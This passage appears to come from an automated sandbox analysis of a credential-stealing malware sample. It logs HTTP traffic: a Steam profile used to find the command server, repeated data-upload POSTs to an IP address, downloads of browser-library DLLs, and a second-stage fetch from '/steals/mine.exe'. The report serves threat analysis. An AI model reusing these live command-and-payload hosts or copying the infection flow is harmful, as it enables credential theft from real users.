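          f"consistent={r['consistent']} relocated_only="
          + ", ".join(f"0x{a:X}->0x{b:X}" for a, b in r["relocated_only"]))
```

Run against the full entry list from the report the same way; a delta that is not constant across the matched pairs would mean the two processes hold different builds rather than one relocated image.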

Networking

Source: Malware configuration extractor URLs: https://steamcommunity.com/profiles/76561199747278259
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Sun, 04 Aug 2024 00:21:35 GMTServer: ApacheLast-Modified: Sat, 03 Aug 2024 17:07:11 GMTETag: "4e7000-61eca7984f383"Accept-Ranges: bytesContent-Length: 5140480Content-Type: application/octet-streamData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 04 00 f9 b7 ad 66 00 00 00 00 00 00 00 00 e0 00 0e 01 0b 01 06 00 00 d2 4c 00 00 9a 01 00 00 00 00 00 4e f0 4c 00 00 20 00 00 00 00 4d 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 e0 4e 00 00 04 00 00 a6 d9 4e 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 f0 4c 00 4b 00 00 00 00 20 4d 00 c6 8c 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 4e 00 0c 00 00 00 af ef 4c 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 54 d0 4c 00 00 20 00 00 00 d2 4c 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 73 64 61 74 61 00 00 8f 09 00 00 00 00 4d 00 00 0a 00 00 00 d6 4c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 c6 8c 01 00 00 20 4d 00 00 8e 01 00 00 e0 4c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 c0 4e 00 00 02 00 00 00 6e 4e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic HTTP traffic detected: GET /profiles/76561199747278259 HTTP/1.1 | Host: steamcommunity.com | Connection: Keep-Alive | Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /profiles/76561199747278259 HTTP/1.1 | Host: steamcommunity.com | Connection: Keep-Alive | Cache-Control: no-cache
Source: Joe Sandbox View IP Address: 104.102.49.249 104.102.49.249
Source: Joe Sandbox View IP Address: 38.180.132.96 38.180.132.96
Source: Joe Sandbox View IP Address: 168.119.176.241 168.119.176.241
Source: Joe Sandbox View ASN Name: AKAMAI-ASUS AKAMAI-ASUS
Source: Joe Sandbox View JA3 fingerprint: 51c64c77e60f3980eea90869b68c58a8
Source: Joe Sandbox View JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
Source: global traffic HTTP traffic detected: GET / HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36 | Host: 168.119.176.241 | Connection: Keep-Alive | Cache-Control: no-cache
Source: global traffic HTTP traffic detected: POST / HTTP/1.1 | Content-Type: multipart/form-data; boundary=----GHDBAFIIECBFHIEBKJJK | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36 | Host: 168.119.176.241 | Content-Length: 278 | Connection: Keep-Alive | Cache-Control: no-cache
Source: global traffic HTTP traffic detected: POST / HTTP/1.1 | Content-Type: multipart/form-data; boundary=----JDAKJDAAFBKFHIEBFCFB | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36 | Host: 168.119.176.241 | Content-Length: 331 | Connection: Keep-Alive | Cache-Control: no-cache
Source: global traffic HTTP traffic detected: POST / HTTP/1.1 | Content-Type: multipart/form-data; boundary=----CGDHIEGCFHCGDGCAECBG | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36 | Host: 168.119.176.241 | Content-Length: 331 | Connection: Keep-Alive | Cache-Control: no-cache
Source: global traffic HTTP traffic detected: POST / HTTP/1.1 | Content-Type: multipart/form-data; boundary=----EBFHJEGDAFHIJKECFBKJ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36 | Host: 168.119.176.241 | Content-Length: 332 | Connection: Keep-Alive | Cache-Control: no-cache
Source: global traffic HTTP traffic detected: POST / HTTP/1.1 | Content-Type: multipart/form-data; boundary=----DBFBFBGDBKJJKFIEHJDB | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36 | Host: 168.119.176.241 | Content-Length: 7013 | Connection: Keep-Alive | Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /sqls.dll HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36 | Host: 168.119.176.241 | Connection: Keep-Alive | Cache-Control: no-cache
Source: global traffic HTTP traffic detected: POST / HTTP/1.1 | Content-Type: multipart/form-data; boundary=----DGDBFBFCBFBKECAAKJKF | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36 | Host: 168.119.176.241 | Content-Length: 4677 | Connection: Keep-Alive | Cache-Control: no-cache
Source: global traffic HTTP traffic detected: POST / HTTP/1.1 | Content-Type: multipart/form-data; boundary=----EGCFHDAKECFIDGDGDBKJ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36 | Host: 168.119.176.241 | Content-Length: 1529 | Connection: Keep-Alive | Cache-Control: no-cache
Source: global traffic HTTP traffic detected: POST / HTTP/1.1 | Content-Type: multipart/form-data; boundary=----ECFHJKEBAAECBFHIECGI | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36 | Host: 168.119.176.241 | Content-Length: 437 | Connection: Keep-Alive | Cache-Control: no-cache
Source: global traffic HTTP traffic detected: POST / HTTP/1.1 | Content-Type: multipart/form-data; boundary=----FHIEBKKFHIEGCAKECGHJ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36 | Host: 168.119.176.241 | Content-Length: 437 | Connection: Keep-Alive | Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /freebl3.dll HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36 | Host: 168.119.176.241 | Connection: Keep-Alive | Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /mozglue.dll HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36 | Host: 168.119.176.241 | Connection: Keep-Alive | Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /msvcp140.dll HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36 | Host: 168.119.176.241 | Connection: Keep-Alive | Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /softokn3.dll HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36 | Host: 168.119.176.241 | Connection: Keep-Alive | Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /vcruntime140.dll HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36 | Host: 168.119.176.241 | Connection: Keep-Alive | Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /nss3.dll HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36 | Host: 168.119.176.241 | Connection: Keep-Alive | Cache-Control: no-cache
Source: global traffic HTTP traffic detected: POST / HTTP/1.1 | Content-Type: multipart/form-data; boundary=----JKJEHJKJEBGHJJKEBGIE | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36 | Host: 168.119.176.241 | Content-Length: 1145 | Connection: Keep-Alive | Cache-Control: no-cache
Source: global traffic HTTP traffic detected: POST / HTTP/1.1 | Content-Type: multipart/form-data; boundary=----JECAFHJEGCFCBFIEGCAE | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36 | Host: 168.119.176.241 | Content-Length: 331 | Connection: Keep-Alive | Cache-Control: no-cache
Source: global traffic HTTP traffic detected: POST / HTTP/1.1 | Content-Type: multipart/form-data; boundary=----CFIEHCFIECBGCBFHIJJK | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36 | Host: 168.119.176.241 | Content-Length: 331 | Connection: Keep-Alive | Cache-Control: no-cache
Source: global traffic HTTP traffic detected: POST / HTTP/1.1 | Content-Type: multipart/form-data; boundary=----AAKEGIJEHJDGDHJKJKKJ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36 | Host: 168.119.176.241 | Content-Length: 498 | Connection: Keep-Alive | Cache-Control: no-cache
Source: global traffic HTTP traffic detected: POST / HTTP/1.1 | Content-Type: multipart/form-data; boundary=----KKKKEHJKFCFCBFHIIDGD | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36 | Host: 168.119.176.241 | Content-Length: 331 | Connection: Keep-Alive | Cache-Control: no-cache
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----GHDBAFIIECBFHIEBKJJKUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36Host: 168.119.176.241Content-Length: 457Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----KEGDAKEHJDHIDHJJDAECUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36Host: 168.119.176.241Content-Length: 99265Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----CFIEHCFIECBGCBFHIJJKUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36Host: 168.119.176.241Content-Length: 331Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36Host: 168.119.176.241Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----KKKJEHCGCGDAAAKFHJKJUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36Host: 168.119.176.241Content-Length: 278Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----BGIJDGCAEBFIIECAKFHIUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36Host: 168.119.176.241Content-Length: 331Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----DGCAAFBFBKFIDGDHJDBKUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36Host: 168.119.176.241Content-Length: 331Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----BFIJEHCBAKFCAKFHCGDGUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36Host: 168.119.176.241Content-Length: 332Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----BGIJDGCAEBFIIECAKFHIUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36Host: 168.119.176.241Content-Length: 6801Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /sqls.dll HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36Host: 168.119.176.241Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----BGIJDGCAEBFIIECAKFHIUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36Host: 168.119.176.241Content-Length: 4677Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /steals/mine.exe HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36Host: 147.45.44.104Cache-Control: no-cache
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----JDAKJDAAFBKFHIEBFCFBUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36Host: arpdabl.zapto.orgContent-Length: 5865Connection: Keep-AliveCache-Control: no-cache
Source: unknown TCP traffic detected without corresponding DNS query: 173.222.162.32
Source: unknown TCP traffic detected without corresponding DNS query: 168.119.176.241
Source: unknown TCP traffic detected without corresponding DNS query: 168.119.176.241
Source: unknown TCP traffic detected without corresponding DNS query: 168.119.176.241
Source: unknown TCP traffic detected without corresponding DNS query: 168.119.176.241
Source: unknown TCP traffic detected without corresponding DNS query: 168.119.176.241
Source: unknown TCP traffic detected without corresponding DNS query: 168.119.176.241
Source: unknown TCP traffic detected without corresponding DNS query: 168.119.176.241
Source: unknown TCP traffic detected without corresponding DNS query: 168.119.176.241
Source: unknown TCP traffic detected without corresponding DNS query: 168.119.176.241
Source: unknown TCP traffic detected without corresponding DNS query: 168.119.176.241
Source: unknown TCP traffic detected without corresponding DNS query: 168.119.176.241
Source: unknown TCP traffic detected without corresponding DNS query: 168.119.176.241
Source: unknown TCP traffic detected without corresponding DNS query: 168.119.176.241
Source: unknown TCP traffic detected without corresponding DNS query: 168.119.176.241
Source: unknown TCP traffic detected without corresponding DNS query: 168.119.176.241
Source: unknown TCP traffic detected without corresponding DNS query: 168.119.176.241
Source: unknown TCP traffic detected without corresponding DNS query: 168.119.176.241
Source: unknown TCP traffic detected without corresponding DNS query: 168.119.176.241
Source: unknown TCP traffic detected without corresponding DNS query: 168.119.176.241
Source: unknown TCP traffic detected without corresponding DNS query: 168.119.176.241
Source: unknown TCP traffic detected without corresponding DNS query: 168.119.176.241
Source: unknown TCP traffic detected without corresponding DNS query: 168.119.176.241
Source: unknown TCP traffic detected without corresponding DNS query: 168.119.176.241
Source: unknown TCP traffic detected without corresponding DNS query: 168.119.176.241
Source: unknown TCP traffic detected without corresponding DNS query: 168.119.176.241
Source: unknown TCP traffic detected without corresponding DNS query: 173.222.162.32
Source: unknown TCP traffic detected without corresponding DNS query: 168.119.176.241
Source: unknown TCP traffic detected without corresponding DNS query: 168.119.176.241
Source: unknown TCP traffic detected without corresponding DNS query: 168.119.176.241
Source: unknown TCP traffic detected without corresponding DNS query: 168.119.176.241
Source: unknown TCP traffic detected without corresponding DNS query: 168.119.176.241
Source: unknown TCP traffic detected without corresponding DNS query: 168.119.176.241
Source: unknown TCP traffic detected without corresponding DNS query: 168.119.176.241
Source: unknown TCP traffic detected without corresponding DNS query: 168.119.176.241
Source: unknown TCP traffic detected without corresponding DNS query: 168.119.176.241
Source: unknown TCP traffic detected without corresponding DNS query: 168.119.176.241
Source: unknown TCP traffic detected without corresponding DNS query: 168.119.176.241
Source: unknown TCP traffic detected without corresponding DNS query: 168.119.176.241
Source: unknown TCP traffic detected without corresponding DNS query: 168.119.176.241
Source: unknown TCP traffic detected without corresponding DNS query: 168.119.176.241
Source: unknown TCP traffic detected without corresponding DNS query: 168.119.176.241
Source: unknown TCP traffic detected without corresponding DNS query: 168.119.176.241
Source: unknown TCP traffic detected without corresponding DNS query: 168.119.176.241
Source: unknown TCP traffic detected without corresponding DNS query: 168.119.176.241
Source: unknown TCP traffic detected without corresponding DNS query: 168.119.176.241
Source: unknown TCP traffic detected without corresponding DNS query: 168.119.176.241
Source: unknown TCP traffic detected without corresponding DNS query: 168.119.176.241
Source: unknown TCP traffic detected without corresponding DNS query: 168.119.176.241
Source: unknown TCP traffic detected without corresponding DNS query: 168.119.176.241
Source: C:\Users\user\Desktop\a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe Code function: 0_2_003D5010 InternetOpenA,StrCmpCA,InternetConnectA,HttpOpenRequestA,InternetSetOptionA,HttpSendRequestA,HttpQueryInfoA,InternetReadFile,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle, 0_2_003D5010
Source: global traffic HTTP traffic detected: GET /profiles/76561199747278259 HTTP/1.1Host: steamcommunity.comConnection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36Host: 168.119.176.241Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /sqls.dll HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36Host: 168.119.176.241Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /freebl3.dll HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36Host: 168.119.176.241Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /mozglue.dll HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36Host: 168.119.176.241Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /msvcp140.dll HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36Host: 168.119.176.241Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /softokn3.dll HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36Host: 168.119.176.241Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /vcruntime140.dll HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36Host: 168.119.176.241Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /nss3.dll HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36Host: 168.119.176.241Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /profiles/76561199747278259 HTTP/1.1Host: steamcommunity.comConnection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36Host: 168.119.176.241Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /sqls.dll HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36Host: 168.119.176.241Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /steals/mine.exe HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36Host: 147.45.44.104Cache-Control: no-cache
Source: MSBuild.exe, 00000006.00000002.2344932078.00000000012C8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.akamai.steamstatic.com/ https://cdn.akamai.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.akamai.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq.cn https://steambroadcastchat.akamaized.net http://127.0.0.1:27060 ws://127.0.0.1:27060; frame-src 'self' steam: https://store.steampowered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/; frame-ancestors 'self' https://store.steampowered.com/; equals www.youtube.com (Youtube)
Source: global traffic DNS traffic detected: DNS query: steamcommunity.com
Source: global traffic DNS traffic detected: DNS query: arpdabl.zapto.org
Source: unknown HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----GHDBAFIIECBFHIEBKJJKUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36Host: 168.119.176.241Content-Length: 278Connection: Keep-AliveCache-Control: no-cache
Source: a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1717876707.0000000003241000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1714614994.0000000003241000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000006.00000002.2344932078.00000000012C8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://127.0.0.1:27060
Source: a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2174954399.0000000003237000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://147.45.44.104/steals/mine.exe
Source: a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2174020167.00000000005D7000.00000004.00000001.01000000.00000003.sdmp String found in binary or memory: http://147.45.44.104/steals/mine.exe1kkkkles
Source: a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2174020167.00000000005D7000.00000004.00000001.01000000.00000003.sdmp String found in binary or memory: http://147.45.44.104/steals/mine.exea
Source: a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2174020167.0000000000408000.00000004.00000001.01000000.00000003.sdmp String found in binary or memory: http://5.0
